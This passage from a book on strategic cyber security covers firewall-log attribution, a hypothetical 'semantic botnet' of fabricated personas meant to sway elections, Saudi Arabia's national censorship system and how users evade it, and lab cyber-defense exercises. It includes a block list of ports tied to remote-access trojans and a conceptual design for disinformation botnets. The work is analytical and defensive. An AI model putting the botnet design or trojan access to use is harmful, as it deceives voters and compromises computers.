DEC 2000 to 23 JAN 2003. 94 My firewall had blocked traffic from over 70 foreign countries. 34 BIRTH OF A CONCEPT: STRATEGIC CYBER SECURITY COUNTRY FAILED ACCESS Canada 121 Brazil 115 France 93 Taiwan 46 Poland 21 Countries robust in international network infrastructure, such as Canada and Tai- wan, will always appear in network traffic. Connections to or from more isolated countries, especially when no logical business relationship can be identified, require close scrutiny. For a more detailed view, IP addresses can be associated with a specific network. IP ADDRESS FAIL OWNER 141.76.XX.XX 25 Tech Univ Informatik, Dresden, Germany 203.241.XX.XX 18 Samsung Networks Inc., Seoul, Korea 212.19.XX.XX 12 Tribute MultiMedia, Amsterdam, Netherlands 61.172.XX.XX 8 CHINANET Shanghai province network 192.58.XX.XX 5 University of California, Berkeley Unfortunately for the analyst, most computer network logs contain many potential threats to investigate. The IP addresses listed in a log file are not always the true source of network traf- fic. Obtaining reliable “attribution” is one of the most frustrating aspects of cyber attacks, as hackers often forge or “spoof” the IP address of an unwitting, third party network. This is possible because Internet routers, for the sake of efficiency, nor- mally only use a data packet’s destination address to forward it across the Internet and disregard the source address. How to improve attribution is one of the hottest topics in cyber defense research. At a minimum, security analysts must use a combination of technical databases such as WHOIS,95 non-technical Web tools such as a good Internet search engine, and common sense, which helps to verify whether the discovered network traffic cor- responds logically to real life activity. 95 WHOIS can tell you the owner of an Internet Protocol (IP) address. 35 Cyber Security: A Technical Primer Firewalls are designed to block many types of suspicious traffic automatically, and often they will prohibit everything that a user does not specifically allow. For ex- ample, there are over 65,000 computer “ports,” or points of entry, into an operating system. By default, my firewall blocked access to the following notorious ports that are associated with “trojans,” or hacker programs that allow illicit remote access to a victim computer. PORT TROJAN 1243 SubSeven 1524 Trinoo 3128 RingZero 27374 Ramen 31337 Back Orifice Blocking known malicious traffic seems easy enough, but hackers are adept at sub- verting whatever connections are allowed onto your computer. For example, the Internet Control Message Protocol (ICMP), commonly used for network manage- ment, is fairly simple in design and would seem amenable to security observation. However, hackers routinely use it for target reconnaissance, Denial of Service (DoS) attacks, and even as a covert channel for communications. Analyzing outbound traffic is just as important as inbound traffic, if not more so. To begin, a security analyst should sort outbound firewall log data by the names of the programs installed on the computer. He or she should verify that legitimate programs are only contacting legitimate IP addresses, e.g., Microsoft Word should only contact Microsoft. All unrecognizable programs should be examined closely. Often, quick Internet searches will suffice. However, if there is no proper (and reassuring) description for it on the Web, the program should be disallowed from contacting the Internet, if not uninstalled from the computer altogether. My firewall log showed that one unidentifiable program, ISA v 1.0, had tried to con- tact a remote computer in both China and France. I could not find any information about the program on the Web, so deleted it from the system. PROG IP ADDRESS DESTINATION DATE ISA 1.0 61.140.X.X Chinanet Guangdong province 7/30/2001 ISA 1.0 193.54.X.X Universite Paris, France 8/10/2001 36 BIRTH OF A CONCEPT: STRATEGIC CYBER SECURITY Another program, WINSIP32.EXE, had tried three times to connect to a U.S. govern- ment agency, the General Services Administration (GSA).96 A further red flag was that the name of the program was suspiciously close to WINZIP, a common program used to minimize file size for transmission via the Internet. I tried unsuccessfully to discuss the issue with a GSA system administrator, who almost certainly managed a hacked network. DATE TIME PROGRAM REMOTE IP ADDRESS 2/18/2002 20:17:06 WINSIP32.EXE 159.142.XX.XX 3/15/2002 07:06:17 WINSIP32.EXE 159.142.XX.XX 3/20/2002 14:54:39 WINSIP32.EXE 159.142.XX.XX The level of technical expertise and experience required to thoroughly evaluate computer network security is high. An analyst must understand hardware and soft- ware, as well as Internet protocols, standards, and services. Security is an art as well as a science that involves common sense, original research, risk management, and a willingness to pick up the phone and speak with unknown system administrators. In fact, the problem of attribution is the most complicating factor in cyber threat analysis. If the attacker is careless and leaves a large digital footprint (e.g., his home IP address), law enforcement may be able to take quick action. If the cyber attacker is smart and covers his digital tracks, then deterrence, evidence collection, and pros- ecution become major challenges. In almost all cases, computer log files alone do not suffice. Unmasking a cyber at- tacker requires the fusion of cyber and non-cyber data points. Investigators must enter the real world if they want to arrest a computer hacker. There will always be clues. If the goal is extortion, where is the money to be paid, and is there a point- of-contact? If the threat is Denial of Service, the target could ask for a proof of ca- pability. The point is to generate a level of interactivity with the cyber threat actor that might be used against it. Further, cross-checking suspect information against trusted sources is always one of the best defenses. In this chapter, the author has tried to make clear that catching a computer hacker is not a simple chore. Cyber attackers are often able to hide in network traffic and remain anonymous to their victims. Still, this does not mean that cyber attacks can easily rise to the level of a strategic threat; but it does mean that, when they do, national se- curity leaders can be in the awkward position of not knowing who is attacking them. This is the topic of the next chapter. 96 GSA supports the basic functioning of other federal agencies. 37 Cyber Security: A Technical Primer Macro-Scale Hacking If one successfully attacked computer can pose a security threat, what if an adver- sary could secretly command thousands or even millions of computers at once? At what point does a tactical cyber attack become a strategic cyber attack? In fact, these are no longer academic questions. The Conficker worm is now esti- mated to have compromised at least seven million computers worldwide,97 leaving an unknown cyber attacker, in theory, in control of their aggregated computer pro- cessing power. “Botnets” are networks of hacker-controlled computers that are organized within a common Command and Control (C2) infrastructure.98 Hackers often use botnets to send spam, spread malicious code, steal data, and conduct Denial of Service (DoS) attacks against other computers and networks around the world. In the future, botnets may be used to conduct more complex and far-reaching at- tacks, some of which could have national security ramifications. One scenario, dem- onstrated in 2009 by the author and Roelof Temmingh,99 envisioned a “semantic botnet,” composed of a virtual army of randomly-generated and/or stolen human identities,100 which could be used to support any personal, political, military, or ter- rorist agenda.101 Such a cyber attack is possible because humans now communicate via ubiquitous software that is by nature impersonal and non-interactive. A botnet made up of thousands or millions of computers could be used to post a wide range of informa- tion, opinions, arguments, or threats across the Internet. These could target a per- son, an organization, or a nation-state and promote any political or criminal cause. The amplification power of the Internet guarantees that not every victim must fall for the scam; a certain percentage will suffice. Most of the information found on the Internet is open to theft and/or abuse. Hack- ers can steal any type of file, text, or graphics and alter it for nefarious purposes. Although effective authentication technologies such as digital signatures exist, they are rarely used for common communications. 97 Piscitello, 2010. 98 Freiling et al, 2005. 99 Temmingh is the founder of Sensepost and Paterva. Their 2009 paper was presented at the CCD CoE Conference on Cyber Warfare. 100 Ramaswamy, 2006. In 2006, identity theft was already the fastest-growing crime in the United States, affecting almost 20,000 persons per day. Acoca, 2008. Nearly a third of all adults in the U.S. reported that security fears had compelled them to shop online less or not at all. 101 Geers & Temmingh, 2009. 38 BIRTH OF A CONCEPT: STRATEGIC CYBER SECURITY The calculated, political manipulation of information, which is today most often found in the form of computer data, is not uncommon. In 2006, Reuters news ser- vice, prior to publishing a photo, darkened the sky over Beirut to make an Israeli air raid appear more dramatic;102 in 2008, newspapers published a photo of an Iranian missile test in which an extra missile had been added;103 and in 2010, Al-Ahram newspaper in Cairo printed a photo after it had switched the places of Presidents Obama and Mubarak at the White House.104 Without some kind of technical means of verification, it can be difficult even for writers and photographers to know that their own work has not been modified. Distinguishing fact from fiction – and humans from robots – is difficult online, espe- cially in a timely and accurate way. Hackers will exploit the maze-like architecture of the Internet, and the anonymity it offers, to make threat evaluation slow and labor-intensive. In short, there is no quick way to determine whether a virtual person really exists. Over time, a fraudulent virtual identity would even come to have a “life” of its own as it posts a variety of information to the Web. Historically, computers have had great difficulty impersonating a human being. In 1950, Alan Turing wrote that even the “dullest” human could outperform a com- puter in a conversation with another human, and that a machine could not provide a “meaningful answer” to a truly wide variety of questions. The celebrated Turing Test was born.105 However, Internet communications are increasingly impersonal conversations. This creates an attack space for a hacker because there is normally insufficient content and interactivity to evaluate whether a particular message was posted by a human or a machine. The average computer programmer could never pass the Turing Test, but he or she could write a program to update the world via Twitter on how a fraudulent Web user is spending her day, or what she thinks about a political leader. Every day, email is losing ground to new media such as YouTube, Facebook, and Twitter. Although the opportunity to cross-examine someone by email is limited, it does exist; email is typically interactive, one-to-one correspondence.106 The new communication models are not one-to-one, but one-to-many or many-to-one. Users feel empowered as they quickly become a prolific producer of digital information; 102 Montagne, 2006. 103 Nizza & Lyons, 2008. 104 “Doctoring photos...” 2010. 105 Oppy & Dowe, 2008. 106 Internet Relay Chat (IRC) is also interactive, but it was never a mainstream form of communication. 39 Cyber Security: A Technical Primer however, much of the output is trivial, and there is a loss of intimacy and interactiv- ity. This benefits a cyber attacker, who can push information to the Web that would not be subject to serious cross-examination. Due to the speed of modern communications, humans do not have much time to analyze what they read on the Web. Was a message posted by a human or a ma- chine? It will be hard to know when even highly idiomatic language can be stolen and repackaged by a hacker. And Natural Language Processing, or the computer analysis of human languages, is still unproven technology that requires significant human oversight to be effective.107 It is increasingly difficult to separate cyberspace from what we think of as the real world; human beings respond to stimuli from both. If a botnet were used to promote a political or military goal, once a certain momentum toward the desired goal were attained – that is, if real people began to follow the robots – the attacker could then begin to scale back the Artificial Intelligence (AI) and reprogram the botnet for its next assignment. It may not matter if the botnet campaign could eventually be discovered and dis- credited. In time-sensitive contexts such as an election it might be too late. The at- tacker may desire to sway public opinion only for a short period of time. In the week before an election, what if both left and right-wing blogs were seeded with false but credible information about one of the candidates? It could tip the balance in a close race to determine the winner. Consider the enormous impact of the 2004 Madrid train bombings on Spain’s national elections, which took place three days later.108 Roelof Temmingh, who is a brilliant programmer, wrote a complex, copy-and-paste algorithm to collect biographical information and facial images from various web- sites and used them to construct skeletons of randomized, artificial personalities. Personal profiles, including categories such “favorite movie,” were added based on details from popular news sites. In future versions of the software, these fraudulent identities would begin to interact with the Web. This is the most difficult step, but far from impossible to implement. Over time, each new identity would assume a virtual “life” of its own. Phishing attacks are successful even though they normally employ only one layer of deceit – the website itself. Intelligent attackers can weave a much more intricate web of deception than that; an entire organization could successfully be faked if the time were taken to invest in enough third-party references. 107 Author interview with Temmingh, 2009. 108 “Europe...” 2004. 40 BIRTH OF A CONCEPT: STRATEGIC CYBER SECURITY One of the primary reasons that such a cyber attack could succeed is the growing power of Web-enabled Open Source Intelligence (OSINT). The average Web user to- day has access to a staggering amount of information. Beginning with only a name, a good OSINT researcher can quickly obtain date-of-birth, address, education, medi- cal records, and much more. Via social networking sites, the attacker may even dis- cover intimate details of a person’s life, including where he or she might physically be at any given moment. Eventually, a web of connections to other people, places, and things can be constructed. Computer hackers are not only able to conduct OSINT via the Web, but also exploit the technical vulnerabilities of the Web to target their victims. Hackers “enumerate,” or conduct in-depth technical reconnaissance, against cyber targets, for information such as an IP address, a timestamp, or other “metadata” that can be exploited in the real world. A semantic botnet could enhance the credibility of any agenda. For example, if the target were an international energy corporation, OSINT might reveal a wide range of attack vectors: disgruntled employees, friction with indigenous populations, whistle blowers, or ongoing lawsuits. The botnet army could be used to target all of the above, via blogs, posting comments to news articles, sending targeted email, etc. (The corporation, of course, could hire its own botnet army in retaliation.) The chal- lenge for the attacker would be to make the communications as realistic as possible while making identity verification a complex and time-consuming challenge. Given the size of cyberspace and the speed at which data packets travel, one of the primary ways to combat a macro-scale cyber threat is by statistical analysis. A secu- rity analyst must use advanced mathematics to identify and counter cyber threats. In an election, humans typically vote in a “bell curve.” Some people are extremists, but most tend to vote for a party somewhere in the middle of the political spectrum. If a botnet controller does not simulate this tendency, statistical analysis of network traffic and internal databases can quickly reveal divergences that could suggest a tainted vote. These include a randomized voting preference (i.e., too many votes on the extremes), demographic anomalies, or strange patterns such as too many votes during normal human working hours. Technical data should not conflict with a security analyst’s common sense. IP ad- dresses must be scattered realistically within the voting space. Internet browsers should manage website visits as a human would, pausing for images to load and allowing time for a user to read important information. Automated computer pro- grams may move too quickly and “mechanically” from one data request to the next. A security analyst should investigate anomalies for other non-human properties. 41 Cyber Security: A Technical Primer The primary challenge to a statistical cyber defense strategy is a mathematically- gifted attacker. In theory, it is possible to give a botnet army a range of dynamic characteristics that are based on real-time analysis of current news and entertain- ment media. However, this is not easy to program, and an attacker can never be completely sure what a security analyst is looking for. An attack always requires some guesswork and miscalculation. Over time, this is a game of cat-and-mouse. A security analyst can write a sophisti- cated algorithm that correlates many factors, such as name, vote, geography, educa- tion, income, and IP address, to known or expected baselines. However, a botnet controller can do the same. One pitfall for the attacker is that, if the bots vote too realistically, or if there are too few bots involved in the attack, there should be a correspondingly small impact on the election. Moreover, in order to mirror real Internet traffic patterns, a botnet needs to be both large and sophisticated. Of course, there are some purely technical investments to be made, including the increased use of Public Key Infrastructure (PKI), biometrics and Internet Protocol version 6 (IPv6). Neural networks, for example, have played a considerable role in reducing credit card fraud.109 For important business transactions, the simple use of a live video feed is beneficial. Unfortunately, the use of good cyber defense tactics and technologies is rare. Most system administrators do not have the time, expertise, or staff to undertake a so- phisticated analysis of their own networks and data. For the foreseeable future, much of the burden is on individual web users to recognize threats emanating from cyberspace and take action (or inaction) to counter them. This chapter has tried to argue that macro-scale cyber attack threats are serious, but most, such as the theoretical botnet army described in this chapter, do not yet pose a threat to national security. It is possible to create one fraudulent web identity, so millions of them could already exist. However, what makes many categories of cyber attack easy – the ubiquity, vulnerability, and anonymity of the web – can also lessen the credibility of a cyber threat. Good OSINT can lead to a significant bluff. To a large extent, the most dangerous threat actors are those with the ability to bridge the gap between the virtual and physical worlds. Thus, there are two impor- tant categories of cyber attacker: those who have “reach” into the real world, and those whose threats are limited to cyberspace. The trouble from a strategic, national 109 Rowland, 2002. 42 BIRTH OF A CONCEPT: STRATEGIC CYBER SECURITY security perspective is that foreign intelligence services and militaries possess that kind of reach, which obviously can make a cyber attack much more serious. All things considered, cyber attacks have the potential to rise to the level of a stra- tegic threat. Therefore, they must be addressed by national security planners. The next chapter will examine how one nation-state, Saudi Arabia, has attempted to miti- gate this threat at the national level. Case Study: Saudi Arabia Every country has a unique perspective on security, especially a country as tradi- tion-bound as Saudi Arabia. But at the technical level, the quest for strategic cyber security mostly comprises the exact same elements: computer hardware, software, legal authority, system administrators, and cyber security experts. Therefore, Saudi Arabia, where there is a strong perception of a close connection between computer security and national security, provides an instructive example. The Saudi government censors a wide range of information based on a mix of mo- rality, security, and politics. It has built a national firewall designed to keep “inap- propriate” web content out of the country, inaccessible from anywhere within its borders, at any time, in public or private spaces. However, from both a semantic and a technical perspective, it is difficult, especially in authoritarian countries, to bal- ance the public’s need and desire for information with the government’s need and desire to maintain information control. Myriad technologies exist that can circumvent or even punch a hole straight through the Saudi national firewall. These include international telephone calls to foreign Internet Service Providers (ISPs), hacking Internet protocols, pseudonymous email accounts and remailers, direct-to-satellite access, peer-to-peer networking, anony- mous proxy servers, encryption, steganography, and more. As censorship circum- vention tools, all have strengths and weaknesses, and none of them is perfect. Specific software applications are not prohibited in the Kingdom per se. For ex- ample, the King Abdul-Aziz City for Science and Technology (KACST) explained that Internet chat programs are allowed unless the software in question is specifically linked to the distribution of pornography.110 Content-filtering on a national scale is a monumental task. The Saudi government built a national proxy server111 at KACST to surveil the nation’s Internet traffic for 110 “The Internet...” Human Rights Watch. 111 Or a single, centralized connection between Saudi Arabia and the outside world, capable of censoring undesirable information. 43 Cyber Security: A Technical Primer “appropriateness” according to Muslim values, traditions, and culture.112 Internet Service Providers must conform to these rules in order to obtain an operating li- cense.113 Such laws are easier to enforce in some countries than others. In Saudi Arabia, the effort is greatly facilitated by the fact that the entire telecommunications network, including international gateways, are owned and operated by the government.114 Saudi Arabia is home to some of the most educated citizens in the Arab world. Fur- thermore, Saudis routinely communicate with each other and with the outside world on a modern and sophisticated telecommunications infrastructure.115 The Kingdom has been connected to the Internet since 1994, but until 1999 access was restricted to state, academic, medical, and research facilities.116 Today, home accounts are wide- spread, and there are hundreds of cyber cafes in the country. Men and women are both active Web surfers, and their average daily time online is over three hours.117 The amount of data processed by KACST every day is so great that the national firewall took two years to build. Due to the sensitive nature of its mission, the entire project is housed under one roof. Technicians are imported from places like the USA and Scandinavia,118 but the censors handing out directives regarding what Web content to block are exclusively Saudi Arabian.119 KACST is analogous to a national post office through which all domestic and in- ternational correspondence must travel. There are now dozens of private ISPs in Saudi Arabia.120 However, KACST is the country’s only officially sanctioned link to the Internet, and all ISPs must route their traffic through its gateway.121 Electronic data is unlike traditional mail in that it is broken into small packets to increase the speed with which it travels through cyberspace, but these packets are reassembled at KACST for inspection.122 From the beginning, KACST’s goals were ambitious. Its president, Saleh Abdulrah- man al-‘Adhel, said that, before his organization would turn on the switch to the 112 Whitaker, 2000. 113 “Saudi Arabian Response...” Virginia Tech. 114 “Cybercensorship...” Human Rights Watch. 115 Dobbs, 2001. 116 Gavi, 1999 and 2002. 117 “Saudi Arabia to double...” 2001. 118 Gardner, 2000. 119 “SafeWeb...” 2000. 120 “The Internet...” Human Rights Watch. 121 “Losing...” 2001. 122 “How Users...” Human Rights Watch. 44 BIRTH OF A CONCEPT: STRATEGIC CYBER SECURITY Internet, KACST would try to eliminate all of the Internet’s negative aspects.123 How- ever, KACST technicians knew that they could not accomplish these goals without strictly regulating the behavior of individual users. Therefore, they forbade the sending or receiving of encrypted information as well as the sharing of usernames and passwords.124 Saudi Arabia’s first line of defense is a list of banned URLs that are explicitly denied when requested by a user from a browser window.125 Many websites commonly ac- cessed outside Saudi Arabia are forbidden. For those websites that are allowed through the filter, Web users access “cached” copies of Internet sites on government-controlled web servers physically located in the country. When a user attempts to visit a website that has not been evaluated by KACST cen- sors, a second stage of the content-filtering system is activated. Software automati- cally examines the site’s content for prohibited words before the request is granted. One of the first is the presence of a “stop word” on the homepage.126 A list of banned topics stops the request from getting through the KACST proxy server. There are at least thirty categories of prohibited information,127 and the number of banned sites goes well into the hundreds of thousands.128 When access to a site is denied, either because its URL is already on the banned list or it is found to contain objectionable material, a pop-up warning window ap- pears on the screen. It informs the user in both Arabic and English, “Access to the requested URL is not allowed!”129 It also informs the user that all Web requests are logged.130 The second warning is important, because law enforcement can, with an IP address, find the computer terminal in question and possibly also locate the end user. This is why in many countries publicly available Internet terminals that allow for easy, anonymous web surfing, are scarce.131 The two-stage system described above is the one advertised by the Saudi govern- ment. However, there are more stifling approaches to censorship, such as the use of a “whitelist,” of which the Saudi government has been accused. Blacklists ban 123 “Saudi Arabian Response...” Virginia Tech. 124 “The Internet...” Human Rights Watch. 125 “The Internet...” Human Rights Watch. 126 “Government-Imposed...” 127 “Losing...” 2001. 128 “Saudi Arabia to double...” 2001. 129 Lee, 2001. 130 Gavi, 1999 and 2002. 131 “How Users...” Human Rights Watch. 45 Cyber Security: A Technical Primer material based on the fact that it has been officially reviewed and deemed to contain inappropriate content.132 Whitelisting, a far stricter policy, takes a dramatically dif- ferent approach, banning everything that is not explicitly allowed.133 In other words, there is no need for a two-stage system. When a user tries to visit an unfamiliar webpage, there is simply no response. The only accessible websites have been pre- approved by the government. Some reporting has quoted “industry insiders” as stat- ing that an internal KACST committee officially sanctions a list of “desirable” sites, and all others have been banned by default.134 With such power over Saudi networks, KACST has the ability to do far more than simple website content filtering. In theory, KACST network administrators can read, block, delete, or alter network traffic based on email address, IP address, or key- words in the message. For example, if “royal family” and “corrupt” were found to exist in the same sentence, such a message could be flagged for closer inspection, perhaps by law enforcement authorities.135 Technical support for such a large system requires an enormous effort. At least ten companies from four foreign countries have played a role in its administration, in- cluding Secure Computing, Symantec, Websense, Surf Control, and N2H2.136 Secure Computing’s software is called SmartFilter. Saudi Arabia began using it as soon as the country was officially connected to the Internet in February 1999. SmartFilter ships with default content categories like pornography and gambling, but it was selected by KACST due to its overall ease of customization. An example of widely-used, open source censorship software is DansGuardian, which is advertised as sophisticated, free Internet surveillance, to create “a cleaner, safer, place for you and your children.” Its settings can be configured from “un- obstructive” to “draconian,” and it can filter data by technical specifications such 132 Such as the words “government” and “corrupt” appearing in the same sentence. From a censor’s perspective, the problem with blacklisting is that it can be easy to fool the system, for example by simply misspelling those words: i.e. “govrment” and “korrupt.” 133 “Government-Imposed...” 134 “The Internet...” Human Rights Watch. 135 “How Users...” Human Rights Watch. 136 There are many content filtering software products to choose from, including 8e6, CensorNet, Content Keeper, Cyber Patrol, Cyber Sentinel, DansGuardian, Fortinet, Internet Sheriff, K9, N2H2, Naomi, Net Nanny, SmartFilter, squidGuard, Surf Control, We-Blocker, Websense, and more. Each can be configured for a single schoolroom or an entire nation-state. 46 BIRTH OF A CONCEPT: STRATEGIC CYBER SECURITY as URL, IP, domain, user, content, file extension, and POST. There are many more advanced features to choose from.137 Privacy advocates criticize the software companies that create such tools, but indus- try representatives counter that their products are politically neutral. According to an executive at Secure Computing, “We can’t enforce how they use it.”138 Pornography is the first topic Saudi authorities mention when asked about Internet censorship. And KACST claims that the battle against pornography has been suc- cessful.139 But according to human rights groups, Saudi Arabia also disallows many political sites.140 A case in point is the website of a London-based dissident group called the Move- ment for Islamic Reform in Arabia (MIRA) (www.islah.org). MIRA’s IP address was on KACST’s list of banned sites, which was apparent in MIRA’s computer log files. MIRA decided to change its IP address, and immediately the site was available again inside Saudi Arabia. (MIRA did not know why the second stage of KACST’s system was not able to block the website based on content.) Eventually, the new IP address was discovered by KACST technicians, who blocked it again. This process repeated itself many times over; on average, MIRA was able to stay ahead of the government for about a week at a time. Its challenge was to make interested Saudi citizens aware of its new address before the block was in place again.141 MIRA was not satisfied with this protracted game of hide-and-seek, so its webmas- ters developed better solutions. First, the site randomized its port numbers, adding more than 60,000 possible Web addresses (equal to the number of available ports on a computer) to each new IP address. This change made it more difficult for KACST to do its detective work, since the Web requests leaving Saudi Arabia for MIRA were not necessarily headed for port 80, which normally hosts websites.142 Next, MIRA developed a novel way to let its followers know the new address. Its email server, islah@islah.org, would respond to a blank email with an automatic reply, containing the IP and port number. From Saudi Arabia, the blank emails were sent from webmail accounts such as Hotmail, whose secure, web application login 137 Advanced features include PICS labeling, MIME type, regular expressions, https, adverts, compressed HTML, intelligent algorithm matches for phrases in mixed HTML/whitespace, and phrase-weighting, which is intended to reduce over- and under-blocking. Furthermore, there is a whitelist mode and stealth mode, where access is granted to the user but an alert is nonetheless sent to administrators. 138 Lee, 2001. 139 Gardner, 2000. 140 “The Internet...” Human Rights Watch. 141 “Losing...” 2001. 142 Dobbs, 2001. 47 Cyber Security: A Technical Primer process made it impossible for KACST to see where the emails were going or what information they contained. MIRA’s head, Dr. Saad Fagih, said that following these changes, the number of Saudi visits to his site rose to 75,000 per day, and that before long KACST abandoned its efforts to block the site. 143 From a technical perspective, it is a challenge even to begin to censor the Internet. But to evaluate frequently changing websites for their moral and political content is a monumental task. Computer software can recognize individual words, but under- standing how they are used by an author in a given sentence or article is much more difficult. Words such as “breast” can be used to block sexual references to women, but the system may also block recipes for cooking chicken breasts. Likewise, it is difficult to avoid sexual references when offering medical advice related to sexually- transmitted diseases (STDs).144 Critics say that the decision to censor information at all leads to over-censorship.145 For example, in practice it is convenient to block an offensive website by IP ad- dress. However, this means that any other website sharing the same IP will also be blocked.146 An attacker can exploit this – and conduct a denial-of-service attack against a target website – simply by “poisoning” its webserver with prohibited mate- rial. Ideally, all censored information should be double-checked by real people to make sure that the system is working properly, but that may not always be practical or even possible. OpenNet Initiative researchers claim that blocked sites include material related to religion, health, education, humor, entertainment, general reference works, com- puter hacking, and political activism. But Saudi authorities argue that their system has safeguards against both over- and under-censorship. KACST provides forms for users to request additions to and removals from the blacklist, and they say hundreds of requests are received each day asking for new sites to be banned, of which about half are subsequently blacklisted. Thus, based on user feedback, around 7,000 sites a month are added to the list. Over 100 requests to unblock sites also arrive each day, many based on a belief that the system has mischaracterized certain web con- tent, but no statistics were offered regarding how many are unblocked.147 143 “Losing...” 2001. 144 “Government-Imposed...” 145 Whitaker, 2000. 146 “Government-Imposed...” 147 Lee, 2001. 48 BIRTH OF A CONCEPT: STRATEGIC CYBER SECURITY On balance, pornography is easier to censor than politics. Vulgar words can simply be removed from network traffic, but software cannot readily determine whether political keywords are used in a positive or negative way by an author. Furthermore, foreign computer technicians are also of little help since the author’s intention may have been positive feedback, constructive criticism, humor, irony, sarcasm, or satire. A proper evaluation requires subject matter experts who are fluent in the local lan- guage, a naturally expensive and time-consuming undertaking. The problem for censors is that users who are intent on obtaining forbidden in- formation often find a way to get it. And Saudi citizens are no different. Some ac- cess the Internet simply by finding computer terminals they assume are not being monitored.148 Others make expensive telephone calls to unrestricted foreign ISPs.149 Increasingly, Saudi citizens have acquired direct-to-satellite Internet access, with dishes small enough to fit discreetly on a balcony or rooftop.150 Blocked websites “mirror” their content on known accessible sites, or users forward the forbidden content by email as an attached file.151 There are many ways to send email that offer an increased level of security, and all of them have been used in Saudi Arabia. Many webmail services are free and do not require users to register with a real name.152 “Remail” services attempt to remove all identifying user information, try not to keep log files of their activity, and route their encrypted email through other remailers before reaching its destination. A govern- ment censor typically only knows that a user has visited a remailer site, but cannot obtain a copy of the message or know its recipient.153 Cutting edge peer-to-peer networking presents another major challenge to Internet censors. It employs virtual private networking (VPN) technology in an attempt to make file-sharing between computer users invisible to firewalls and content-filtering systems such as that used in Saudi Arabia.154 Saudi Web surfers have often made use of anonymous proxy servers,155 which make web requests on a user’s behalf, by substituting their own IP for that of the user. Unwanted tracking software, such as a browser “cookie,” is also disabled in the pro- 148 “How Users...” Human Rights Watch. 149 Whitaker, 2000. 150 “How Users...” Human Rights Watch. 151 ““The Internet...” Human Rights Watch. 152 “How Users...” Human Rights Watch. 153 “How Users...” Human Rights Watch. 154 Lee, 2001. 155 Dobbs, 2001. 49 Cyber Security: A Technical Primer cess. APS IPs are of course blocked by KACST,156 but such services try to make such blocking as difficult as possible.157 Today, strong encryption, such as Pretty Good Privacy (PGP), is both reliable and cheap. PGP’s design, which couples a sophisticated encryption algorithm with a se- cret passphrase, works so well that it has come to play an important role in provid- ing privacy to individual web users around the world. As a result, many countries, including Saudi Arabia, disallow its use.158 Information on computer hacking, which can give ordinary citizens an upper hand in figuring out how to beat censorship, is often banned.159 But no specific tools can be recommended because none of them is perfect.160 New software tools are frequently released, some of which are specifically designed to support anti-censorship movements. Psiphon, for example, is easy to use and difficult for governments to discover. It works like this: a computer user in an un- censored country installs Psiphon on his or her computer and then allows a user in a censored country to open an encrypted connection through their computer to the Internet. Connection information, including a username and password, is passed by telephone, posted mail, or human contact. In summary, network communications are highly vulnerable to surveillance, espe- cially when all traffic flows through one state-owned system. The Saudi national firewall has been successful in keeping ordinary users from visiting many anti- Muslim or anti-Saudi websites. However, it is extremely difficult for any govern- ment to prevent those who are willing to accept the risk of arrest from conducting prohibited activities. In the long run, large-scale Internet control may be doomed to failure. Censorship tends to inhibit economic development, and governments are often simply too far behind the technology curve. New websites appear every minute, and any one of them – or all of them – are potentially hostile. Saudi officials publicly acknowledge that it is hard to keep up.161 This chapter sought to demonstrate that managing Internet security is highly prob- lematic, even for a willing and well-resourced government. But from a strategic secu- rity perspective, there are concerns that lie above and beyond political criticism and 156 “SafeWeb...” 2000. 157 “SafeWeb...” 2000. 158 “How Users...” Human Rights Watch. 159 Gavi, 1999 and 2002. 160 “How Users...” Human Rights Watch. 161 Gardner, 2000. 50 BIRTH OF A CONCEPT: STRATEGIC CYBER SECURITY pornography: to wit, the protection of national critical infrastructures. Are they safe from cyber attack? This is the topic of the next chapter, which examines a hypotheti- cal cyber terrorist attack against an electricity plant. Modeling Cyber Attack and Defense in a Laboratory Many national security thinkers fear that the age of cyber terrorism and cyber war- fare is coming soon. And the target list seems to grow by the day: electricity,162 water, air traffic control, stock exchange,163 national elections,164 and more. However, the extent to which cyber attacks pose a true threat to national security is unclear. Expert opinions range from dismissive165 to apocalyptic.166 We do know that there are worrisome trends in information technology (IT). Nation- al critical infrastructures are increasingly connected to the Internet. At the same time, their custom IT systems, some created in the 1950s and 1960s, are now being replaced with less expensive, off-the-shelf and Internet-enabled Windows and UNIX systems that are not only easier to use but easier to hack. The older systems were relatively more secure because they were not well-understood by outsiders and be- cause they had minimal network contact with other computer systems.167 National security planners require a better understanding of the threat posed by cy- ber attacks as soon as possible. Some real-world case studies exist.168 However, much information lies outside the public domain. Furthermore, there have been no wars yet between two Internet-enabled militaries, and the ignorance of many organiza- tions regarding the state of their own cyber security is alarming. Looking toward the future, military planners must be able to simulate cyber attacks and test cyber 162 “Remarks by the President...” 2009; “Cyber War...” 2009: The threat to electricity encompasses everything that relies on electricity to function, including computer systems. In May 2009, President Obama stated that “cyber attacks have plunged entire cities into darkness,” reportedly referencing large scale, anonymous attacks in Brazil. 163 Wagner, 2010: In May 2010, after the Dow Jones surprisingly plunged almost 1,000 points, White House adviser John Brennan stated that officials had considered but found no evidence of a malicious cyber attack. 164 Orr, 2007: In 2007, California held a hearing for election officials on the subject of whether hackers could subvert the integrity of the state’s touch-screen voting machines. While the system manufacturer disputed the validity of the tests, the Red Team leader testified that the voting system was vulnerable to numerous attacks that could be carried out quickly. 165 Persuasive cyber war skeptics include Cambridge University Professor Ross Anderson, Wired “Threat Level” Editor Kevin Poulsen, and Foreign Policy editor Evgeny Morozov. 166 Bliss, 2010: In early 2010, former U.S. Director of National Intelligence Michael McConnell testified that the U.S. would “lose” a cyber war today, and that it will probably take a “catastrophic event” before needed security measures are undertaken to secure the Internet. 167 Preimesberger, 2006. 168 Geers, 2008: This author has highlighted the cases of Chechnya, Kosovo, Israel, China, and Estonia. 51 Cyber Security: A Technical Primer defenses within the bounds of a safe laboratory environment, without threatening the integrity of operational networks.169 The need for cyber defense exercises (CDX) is clear. But the complex and ever- changing nature of IT and computer hacking makes conducting a realistic CDX an enormous challenge and may render its conclusions valid only for a short period of time. The world is experiencing a rapid proliferation of computing devices, process- ing power, user-friendly hacker tools, practical encryption, and Web-enabled intel- ligence collection.170 At the same time, a CDX requires the simulation of not only adversary and friendly forces, but even the battlefield itself. Of course, the military is no stranger to computers. Software is now used to train tank drivers and pilots; it is also used to simulate battles, campaigns, and even com- plex geopolitical scenarios. But it remains controversial how closely a computer sim- ulation can model the complexity of the real world. Myriad factors can contribute to failure – poor intelligence, incorrect assumptions, miscalculations, a flawed scoring system, and even political considerations. In 2002, the U.S. military spent $250 million on a war game called Millennium Challenge, which was designed to model an invasion of Iraq. In the middle of the exercise, the Red Team (RT) leader, Marine Corps Lt. Gen. Paul Van Riper, quit the game on the grounds that it had been rigged to ensure a Blue Team (BT) victory.171 